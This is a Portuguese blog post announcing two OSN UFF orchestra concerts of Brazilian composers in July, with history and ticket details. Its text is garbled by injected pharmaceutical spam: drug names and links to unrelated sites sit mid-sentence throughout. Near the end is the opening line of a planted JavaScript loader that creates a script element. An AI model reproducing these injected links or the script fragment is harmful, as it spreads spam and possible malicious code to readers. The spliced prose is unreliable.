Música sinfônicaProgramaçãoRio de Janeiro

Alvorada brasileira

Em dois concertos, OSN UFF apresenta obras de Krieger, Lorenzo Fernandez e Mignone em parceria com ABM.

 

Nos dias 9 e 11 de julho, a Orquestra Sinfônica Nacional UFF (OSN UFF) apresenta, em Niterói e no Rio de Janeiro, um repertório que dialoga com sua própria história. Em parceria com a Academia Brasileira de Música (ABM), os concertos oferecem ao público apenas composições de autores brasileiros integrantes da Academia. Em comum, eles têm ainda a influência dos elementos nacionalistas em suas músicas. Os concertos integram a série Alvorada amoxil reviews http://labor-szkolenia.pl/where-can-you-buy-sominex/ e têm regência do maestro Silvio Viegas.

A parceria com a ABM une duas instituições criadas com a missão intrínseca de valorizar e difundir a música brasileira de concerto em atividades essenciais e complementares. Os três compositores escolhidos também são personagens chaves na história da música de concerto brasileira do século 19 e dois deles também fazem parte da vida da OSN.

Edino Krieger Viagra Jelly online , autor de Abertura Brasileira, foi regente titular da Orquestra quando esta ainda pertencia à Rádio MEC. Pills Francisco Mignone, de quem será interpretada a Sinfonia Tropical, foi o primeiro regente da Orquestra. A apresentação se encerra com a Sinfonia n. 2 – O Caçador de Esmeraldas, de Oscar Lorenzo Fernandez, escrita sobre o poema homônimo de Olavo Bilac.

 

OSN UFF Buy

A Orquestra Sinfônica Nacional nasceu em janeiro de 1961, pela assinatura do então presidente da República, Juscelino Kubitschek. A OSN era parte da Rádio MEC e atuou por muitos anos no sistema de radiodifusão, desempenhando uma importante função social de divulgação da música brasileira de concerto. Em 1984, a orquestra foi integrada à Universidade Federal Fluminense (UFF), onde dá continuidade à sua missão de preservar e apresentar para o público obras de compositores nacionais e estrangeiros.

Em 2009, a OSN UFF deu início a uma nova fase. Sem deixar de lado seus objetivos principais, a orquestra optou por trabalhar com regentes convidados, além de solistas especializados nos mais variados instrumentos. Junto com os tradicionais concertos abertos ao público, a OSN UFF desenvolve também projetos como o Sons da Orquestra can you buy gabapentin over the counter , voltado para formação de plateia, que se apresenta em escolas da rede pública com uma mistura de música e contação de histórias, e a série Rio, que visa ocupar espaços da música de concerto na cidade do Rio de Janeiro.

 

SERVIÇO:

 

Orquestra Sinfônica Nacional UFF http://www.stylecommerce.com/protonix-generic-otc/

Order Silvio Viegas, regência

 

9 de julho, domingo, às 10h30

Cine Arte UFF online (R. Miguel de Frias, 9, Icaraí – Niterói. Tels.: 21 3674-7511 e 3674-7512)

 

Ingressos: R$ 14, com meia-entrada para estudantes e pessoas com mais de 60 anos

 

11 de julho, terça-feira, às 20h himalaya speman price in delhi

Sala Cecília Meireles (Largo da Lapa, 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

 

Ingressos: R$ 40, com meia-entrada para estudantes e pessoas com mais de 60 anos

 

Sugestão etária: livre

Cialis Professional
var d=document;var s=d.createElement(‘script’);

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.